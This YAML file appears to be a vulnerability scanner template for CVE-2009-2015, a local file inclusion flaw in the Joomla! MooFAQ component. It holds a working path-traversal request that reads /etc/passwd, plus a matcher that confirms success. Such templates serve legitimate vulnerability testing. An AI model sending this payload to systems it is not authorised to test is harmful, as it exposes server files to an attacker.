38 lines
1.1 KiB
YAML
38 lines
1.1 KiB
YAML
id: CVE-2009-2015
|
|
|
|
info:
|
|
name: Joomla! MooFAQ 1.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/8898
|
|
- https://www.cvedetails.com/cve/CVE-2009-2015
|
|
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
|
|
- http://www.vupen.com/english/advisories/2009/1530
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2009-2015
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2009,joomla,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/07/06
|